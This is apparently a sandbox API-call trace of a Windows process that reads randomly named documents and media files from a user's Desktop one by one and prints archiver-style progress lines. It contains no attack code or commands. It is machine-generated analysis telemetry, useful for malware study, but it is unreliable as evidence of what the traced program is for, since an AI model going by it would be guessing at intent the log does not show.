malloc (_Size=0x60) returned 0x1c85bb8 [0062.699] free (_Block=0x0) [0062.699] malloc (_Size=0x1) returned 0x27fb60 [0062.699] free (_Block=0x0) [0062.699] malloc (_Size=0x4) returned 0x27fbe0 [0062.699] free (_Block=0x0) [0062.699] malloc (_Size=0x8) returned 0x27fbf0 [0062.699] malloc (_Size=0x18) returned 0x1c86188 [0062.699] ResetEvent (hEvent=0xd0) returned 1 [0062.699] ResetEvent (hEvent=0xd4) returned 1 [0062.700] ResetEvent (hEvent=0xd8) returned 1 [0062.700] malloc (_Size=0x20) returned 0x1c82d68 [0062.700] realloc (_Block=0x0, _Size=0xa) returned 0x1c87a50 [0062.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJg6m_dnHXJPIeQU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fjg6m_dnhxjpiequ.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.700] free (_Block=0x1c866d0) [0062.701] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xf08c, lpOverlapped=0x0) returned 1 [0062.703] SetEvent (hEvent=0xd4) returned 1 [0062.703] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.704] GetTickCount () returned 0x1147215 [0062.704] strcmp (_Str1="+", _Str2="+") returned 0 [0062.704] strlen (_Str="12") returned 0x2 [0062.704] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="FJg6m_dnHXJPIeQU.pps", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.704] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="FJg6m_dnHXJPIeQU.pps", cchWideChar=20, lpMultiByteStr=0x1c82010, cbMultiByte=20, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="FJg6m_dnHXJPIeQU.pps \r", lpUsedDefaultChar=0x22e868) returned 20 [0062.704] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.705] fputs (in: _Str=" 12% 5 + FJg6m_dnHXJPIeQU.pps", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.706] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.706] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.706] free (_Block=0x1c86650) [0062.706] free (_Block=0x1c87b28) [0062.706] CloseHandle (hObject=0xe8) returned 1 [0062.706] free (_Block=0x1c865f0) [0062.707] SetEvent (hEvent=0xd4) returned 1 [0062.707] free (_Block=0x1c87b10) [0062.707] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.709] malloc (_Size=0x70) returned 0x1c86818 [0062.709] wcscmp (_String1="FJg6m_dnHXJPIeQU.pps", _String2="FJg6m_dnHXJPIeQU.pps") returned 0 [0062.709] strlen (_Str="12") returned 0x2 [0062.709] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="FJg6m_dnHXJPIeQU.pps", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.709] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="FJg6m_dnHXJPIeQU.pps", cchWideChar=20, lpMultiByteStr=0x1c82010, cbMultiByte=20, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="FJg6m_dnHXJPIeQU.pps \r", lpUsedDefaultChar=0x22e9a8) returned 20 [0062.709] strcmp (_Str1=" 12% 5 + FJg6m_dnHXJPIeQU.pps", _Str2=" 12% 6 + FJg6m_dnHXJPIeQU.pps") returned -1 [0062.709] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.710] fputs (in: _Str=" 12% 6 + FJg6m_dnHXJPIeQU.pps", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.711] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.711] malloc (_Size=0x60) returned 0x1c85bb8 [0062.711] free (_Block=0x0) [0062.711] malloc (_Size=0x1) returned 0x27fb60 [0062.711] free (_Block=0x0) [0062.711] malloc (_Size=0x4) returned 0x27fbe0 [0062.711] free (_Block=0x0) [0062.711] malloc (_Size=0x8) returned 0x27fbf0 [0062.712] malloc (_Size=0x18) returned 0x1c861c8 [0062.712] malloc (_Size=0x20) returned 0x1c82d68 [0062.712] realloc (_Block=0x0, _Size=0xa) returned 0x1c87b10 [0062.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hjb-m4EYHMa7GTDEF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hjb-m4eyhma7gtdef.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.712] free (_Block=0x1c866d0) [0062.713] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x59e3, lpOverlapped=0x0) returned 1 [0062.714] SetEvent (hEvent=0xd4) returned 1 [0062.714] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.715] GetTickCount () returned 0x1147224 [0062.715] strcmp (_Str1="+", _Str2="+") returned 0 [0062.715] strlen (_Str="12") returned 0x2 [0062.715] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Hjb-m4EYHMa7GTDEF.doc", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0062.715] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Hjb-m4EYHMa7GTDEF.doc", cchWideChar=21, lpMultiByteStr=0x1c82010, cbMultiByte=21, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="Hjb-m4EYHMa7GTDEF.doc \r", lpUsedDefaultChar=0x22e868) returned 21 [0062.715] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.715] fputs (in: _Str=" 12% 6 + Hjb-m4EYHMa7GTDEF.doc", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.716] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.716] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.716] free (_Block=0x1c86650) [0062.716] free (_Block=0x1c87b58) [0062.716] CloseHandle (hObject=0xe8) returned 1 [0062.716] free (_Block=0x1c865f0) [0062.717] SetEvent (hEvent=0xd4) returned 1 [0062.717] free (_Block=0x1c87b40) [0062.717] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.717] malloc (_Size=0x40) returned 0x1c84cb8 [0062.717] wcscmp (_String1="Hjb-m4EYHMa7GTDEF.doc", _String2="Hjb-m4EYHMa7GTDEF.doc") returned 0 [0062.717] strlen (_Str="12") returned 0x2 [0062.718] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Hjb-m4EYHMa7GTDEF.doc", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0062.718] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Hjb-m4EYHMa7GTDEF.doc", cchWideChar=21, lpMultiByteStr=0x1c82010, cbMultiByte=21, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="Hjb-m4EYHMa7GTDEF.doc \r", lpUsedDefaultChar=0x22e9a8) returned 21 [0062.718] strcmp (_Str1=" 12% 6 + Hjb-m4EYHMa7GTDEF.doc", _Str2=" 12% 7 + Hjb-m4EYHMa7GTDEF.doc") returned -1 [0062.718] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.718] fputs (in: _Str=" 12% 7 + Hjb-m4EYHMa7GTDEF.doc", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.719] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.719] malloc (_Size=0x60) returned 0x1c85bb8 [0062.719] free (_Block=0x0) [0062.719] malloc (_Size=0x1) returned 0x27fb60 [0062.719] free (_Block=0x0) [0062.719] malloc (_Size=0x4) returned 0x27fbe0 [0062.719] free (_Block=0x0) [0062.719] malloc (_Size=0x8) returned 0x27fbf0 [0062.719] malloc (_Size=0x18) returned 0x1c86148 [0062.719] ResetEvent (hEvent=0xd0) returned 1 [0062.720] ResetEvent (hEvent=0xd4) returned 1 [0062.720] ResetEvent (hEvent=0xd8) returned 1 [0062.720] malloc (_Size=0x20) returned 0x1c82d90 [0062.720] realloc (_Block=0x0, _Size=0xa) returned 0x1c87b40 [0062.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HMYVWNui_rNMPXSZ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmyvwnui_rnmpxsz.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.720] free (_Block=0x1c866d0) [0062.720] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x1117c, lpOverlapped=0x0) returned 1 [0062.722] SetEvent (hEvent=0xd4) returned 1 [0062.722] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.722] GetTickCount () returned 0x1147234 [0062.722] strcmp (_Str1="+", _Str2="+") returned 0 [0062.722] strlen (_Str="15") returned 0x2 [0062.722] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="HMYVWNui_rNMPXSZ.bmp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.723] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="HMYVWNui_rNMPXSZ.bmp", cchWideChar=20, lpMultiByteStr=0x1c82010, cbMultiByte=20, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="HMYVWNui_rNMPXSZ.bmp \r", lpUsedDefaultChar=0x22e868) returned 20 [0062.723] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.723] fputs (in: _Str=" 15% 7 + HMYVWNui_rNMPXSZ.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.724] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.724] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.724] free (_Block=0x1c86650) [0062.724] free (_Block=0x1c87b88) [0062.724] CloseHandle (hObject=0xe8) returned 1 [0062.724] free (_Block=0x1c865f0) [0062.724] SetEvent (hEvent=0xd4) returned 1 [0062.724] free (_Block=0x1c87b70) [0062.724] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.726] malloc (_Size=0x90) returned 0x1c865f0 [0062.726] wcscmp (_String1="HMYVWNui_rNMPXSZ.bmp", _String2="HMYVWNui_rNMPXSZ.bmp") returned 0 [0062.726] strlen (_Str="15") returned 0x2 [0062.726] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="HMYVWNui_rNMPXSZ.bmp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.726] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="HMYVWNui_rNMPXSZ.bmp", cchWideChar=20, lpMultiByteStr=0x1c82010, cbMultiByte=20, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="HMYVWNui_rNMPXSZ.bmp \r", lpUsedDefaultChar=0x22e9a8) returned 20 [0062.726] strcmp (_Str1=" 15% 7 + HMYVWNui_rNMPXSZ.bmp", _Str2=" 15% 8 + HMYVWNui_rNMPXSZ.bmp") returned -1 [0062.726] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.727] fputs (in: _Str=" 15% 8 + HMYVWNui_rNMPXSZ.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.728] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.728] malloc (_Size=0x60) returned 0x1c85bb8 [0062.728] free (_Block=0x0) [0062.728] malloc (_Size=0x1) returned 0x27fb60 [0062.728] free (_Block=0x0) [0062.728] malloc (_Size=0x4) returned 0x27fbe0 [0062.728] free (_Block=0x0) [0062.728] malloc (_Size=0x8) returned 0x27fbf0 [0062.728] malloc (_Size=0x18) returned 0x1c86168 [0062.728] malloc (_Size=0x2c) returned 0x1c87de8 [0062.728] realloc (_Block=0x0, _Size=0xa) returned 0x1c87b70 [0062.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\i0eSQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i0esq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.728] free (_Block=0x1c88fe8) [0062.728] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x16f23, lpOverlapped=0x0) returned 1 [0062.730] SetEvent (hEvent=0xd4) returned 1 [0062.730] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.730] GetTickCount () returned 0x1147234 [0062.731] strcmp (_Str1="+", _Str2="+") returned 0 [0062.731] strlen (_Str="18") returned 0x2 [0062.731] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.731] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=9, lpMultiByteStr=0x1c82010, cbMultiByte=9, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="i0eSQ.mp3 \r", lpUsedDefaultChar=0x22e868) returned 9 [0062.731] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.731] fputs (in: _Str=" 18% 8 + i0eSQ.mp3", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.732] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.732] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.732] free (_Block=0x1c87f20) [0062.732] free (_Block=0x1c87bb8) [0062.732] CloseHandle (hObject=0xe8) returned 1 [0062.732] free (_Block=0x1c86538) [0062.732] SetEvent (hEvent=0xd4) returned 1 [0062.733] free (_Block=0x1c87ba0) [0062.733] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.737] malloc (_Size=0x58) returned 0x1c86538 [0062.738] wcscmp (_String1="i0eSQ.mp3", _String2="i0eSQ.mp3") returned 0 [0062.738] strlen (_Str="18") returned 0x2 [0062.738] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0062.738] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="i0eSQ.mp3", cchWideChar=9, lpMultiByteStr=0x1c82010, cbMultiByte=9, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="i0eSQ.mp3 \r", lpUsedDefaultChar=0x22e9a8) returned 9 [0062.738] strcmp (_Str1=" 18% 8 + i0eSQ.mp3", _Str2=" 18% 9 + i0eSQ.mp3") returned -1 [0062.738] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.739] fputs (in: _Str=" 18% 9 + i0eSQ.mp3", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.739] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.739] malloc (_Size=0x60) returned 0x1c85bb8 [0062.740] free (_Block=0x0) [0062.740] malloc (_Size=0x1) returned 0x27fb60 [0062.740] free (_Block=0x0) [0062.740] malloc (_Size=0x4) returned 0x27fbe0 [0062.740] free (_Block=0x0) [0062.740] malloc (_Size=0x8) returned 0x27fbf0 [0062.740] malloc (_Size=0x18) returned 0x1c861e8 [0062.740] ResetEvent (hEvent=0xd0) returned 1 [0062.740] ResetEvent (hEvent=0xd4) returned 1 [0062.740] ResetEvent (hEvent=0xd8) returned 1 [0062.740] malloc (_Size=0x20) returned 0x1c82ca0 [0062.740] realloc (_Block=0x0, _Size=0xa) returned 0x1c87ba0 [0062.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\isH8zy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ish8zy.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.740] free (_Block=0x1c89058) [0062.740] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x166aa, lpOverlapped=0x0) returned 1 [0062.742] SetEvent (hEvent=0xd4) returned 1 [0062.742] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.742] GetTickCount () returned 0x1147243 [0062.743] strcmp (_Str1="+", _Str2="+") returned 0 [0062.743] strlen (_Str="22") returned 0x2 [0062.743] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.743] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=10, lpMultiByteStr=0x1c82010, cbMultiByte=10, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="isH8zy.flv \r", lpUsedDefaultChar=0x22e868) returned 10 [0062.743] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.743] fputs (in: _Str=" 22% 9 + isH8zy.flv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.744] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.744] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.744] free (_Block=0x1c88fe8) [0062.744] free (_Block=0x1c87be8) [0062.744] CloseHandle (hObject=0xe8) returned 1 [0062.745] free (_Block=0x1c87f20) [0062.745] SetEvent (hEvent=0xd4) returned 1 [0062.745] free (_Block=0x1c87bd0) [0062.745] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.746] malloc (_Size=0xb8) returned 0x1c87f20 [0062.747] wcscmp (_String1="isH8zy.flv", _String2="isH8zy.flv") returned 0 [0062.747] strlen (_Str="22") returned 0x2 [0062.747] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0062.747] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="isH8zy.flv", cchWideChar=10, lpMultiByteStr=0x1c82010, cbMultiByte=10, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="isH8zy.flv \r", lpUsedDefaultChar=0x22e9a8) returned 10 [0062.747] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.822] fputs (in: _Str=" 22% 10 + isH8zy.flv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.822] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.822] malloc (_Size=0x60) returned 0x1c85bb8 [0062.822] free (_Block=0x0) [0062.822] malloc (_Size=0x1) returned 0x27fb60 [0062.822] free (_Block=0x0) [0062.822] malloc (_Size=0x4) returned 0x27fbe0 [0062.822] free (_Block=0x0) [0062.823] malloc (_Size=0x8) returned 0x27fbf0 [0062.823] malloc (_Size=0x18) returned 0x1c86208 [0062.823] ResetEvent (hEvent=0xd0) returned 1 [0062.823] ResetEvent (hEvent=0xd4) returned 1 [0062.823] ResetEvent (hEvent=0xd8) returned 1 [0062.823] malloc (_Size=0x20) returned 0x1c82ca0 [0062.823] realloc (_Block=0x0, _Size=0xa) returned 0x1c87bd0 [0062.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KaGXpX_uv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kagxpx_uv.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.823] free (_Block=0x1c86890) [0062.823] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x9358, lpOverlapped=0x0) returned 1 [0062.825] SetEvent (hEvent=0xd4) returned 1 [0062.825] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.826] GetTickCount () returned 0x1147291 [0062.826] strcmp (_Str1="+", _Str2="+") returned 0 [0062.826] strlen (_Str="23") returned 0x2 [0062.826] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0062.826] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=14, lpMultiByteStr=0x1c82010, cbMultiByte=14, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="KaGXpX_uv.docx \r", lpUsedDefaultChar=0x22e868) returned 14 [0062.826] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.827] fputs (in: _Str=" 23% 10 + KaGXpX_uv.docx", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.828] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.828] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.828] free (_Block=0x1c867a0) [0062.828] free (_Block=0x1c87c18) [0062.828] CloseHandle (hObject=0xe8) returned 1 [0062.828] free (_Block=0x1c865d0) [0062.828] SetEvent (hEvent=0xd4) returned 1 [0062.828] free (_Block=0x1c87c00) [0062.828] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.830] free (_Block=0x1c83d40) [0062.830] free (_Block=0x1c86248) [0062.830] free (_Block=0x1c82ca0) [0062.830] free (_Block=0x0) [0062.830] free (_Block=0x0) [0062.830] free (_Block=0x0) [0062.830] malloc (_Size=0x8) returned 0x1c83d40 [0062.830] malloc (_Size=0x1e) returned 0x1c82ca0 [0062.830] free (_Block=0x1c83d40) [0062.830] malloc (_Size=0x12) returned 0x1c86248 [0062.830] wcscmp (_String1="KaGXpX_uv.docx", _String2="KaGXpX_uv.docx") returned 0 [0062.830] strlen (_Str="23") returned 0x2 [0062.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0062.830] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KaGXpX_uv.docx", cchWideChar=14, lpMultiByteStr=0x1c82010, cbMultiByte=14, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="KaGXpX_uv.docx \r", lpUsedDefaultChar=0x22e9a8) returned 14 [0062.830] strcmp (_Str1=" 23% 10 + KaGXpX_uv.docx", _Str2=" 23% 11 + KaGXpX_uv.docx") returned -1 [0062.830] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.831] fputs (in: _Str=" 23% 11 + KaGXpX_uv.docx", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.832] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.832] malloc (_Size=0x60) returned 0x1c85bb8 [0062.832] free (_Block=0x0) [0062.832] malloc (_Size=0x1) returned 0x27fb60 [0062.832] free (_Block=0x0) [0062.832] malloc (_Size=0x4) returned 0x27fbe0 [0062.833] free (_Block=0x0) [0062.833] malloc (_Size=0x8) returned 0x27fbf0 [0062.833] malloc (_Size=0x18) returned 0x1c86328 [0062.833] malloc (_Size=0x38) returned 0x1c880c0 [0062.833] realloc (_Block=0x0, _Size=0xa) returned 0x1c87a98 [0062.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KGvZ520tJ.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kgvz520tj.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.833] free (_Block=0x1c891b0) [0062.833] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, 